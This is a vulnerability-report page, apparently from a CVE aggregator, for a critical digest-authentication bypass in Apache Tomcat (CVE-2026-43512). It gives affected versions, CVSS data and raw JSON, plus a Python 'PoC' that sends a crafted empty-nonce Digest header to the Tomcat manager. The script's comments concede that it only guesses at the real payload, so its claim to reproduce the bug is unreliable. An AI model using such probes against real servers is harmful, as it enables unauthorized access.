Security Vulnerability Report
中文
CVE-2026-43512 CVSS 9.8 CRITICAL

CVE-2026-43512

Published: 2026-05-12 16:16:18
Last Modified: 2026-05-14 20:17:06
Source: [email protected]

Description

DEPRECATED: Authentication Bypass Issues vulnerability in digest authentication in Apache Tomcat. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.21, from 10.1.0-M1 through 10.1.54, from 9.0.0.M1 through 9.0.117, from 8.5.0 through 8.5.100, from before 7.0.0. Older unsupported versions any also be affect Users are recommended to upgrade to version 11.0.22, 10.1.55 or 9.0.118 which fix the issue.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Apache Tomcat 11.0.0-M1 - 11.0.21
Apache Tomcat 10.1.0-M1 - 10.1.54
Apache Tomcat 9.0.0.M1 - 9.0.117
Apache Tomcat 8.5.0 - 8.5.100
Apache Tomcat < 7.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target URL (A protected resource requiring Digest Auth) target_url = "http://target-tomcat:8080/manager/html" # In a real digest auth bypass scenario, the specific manipulation depends on the bug. # This PoC demonstrates attempting to access a resource without valid credentials # or with a malformed Authorization header to trigger the bypass. headers = { # Attempting to bypass by sending a malformed or crafted Authorization header # The exact payload depends on the specific vulnerability details. "Authorization": "Digest username=\"admin\", realm=\"Tomcat Manager Application\", nonce=\"\", uri=\"/manager/html\", response=\"\"" } try: response = requests.get(target_url, headers=headers, timeout=5) if response.status_code == 200: print("[+] Potential Bypass Successful! Resource accessed.") print("[+] Response Body:") print(response.text[:500]) else: print(f"[-] Bypass Failed. Status Code: {response.status_code}") except Exception as e: print(f"[!] Error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-43512", "sourceIdentifier": "[email protected]", "published": "2026-05-12T16:16:17.990", "lastModified": "2026-05-14T20:17:05.560", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "DEPRECATED: Authentication Bypass Issues vulnerability in digest authentication in Apache Tomcat.\n\nThis issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.21, from 10.1.0-M1 through 10.1.54, from 9.0.0.M1 through 9.0.117, from 8.5.0 through 8.5.100, from before 7.0.0.\nOlder unsupported versions any also be affect\n\nUsers are recommended to upgrade to version 11.0.22, 10.1.55 or 9.0.118 which fix the issue."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-592"}]}], "references": [{"url": "https://lists.apache.org/thread/7x09x7o12solvclslw3sz0288xc8wx73", "source": "[email protected]"}, {"url": "http://www.openwall.com/lists/oss-security/2026/05/12/8", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.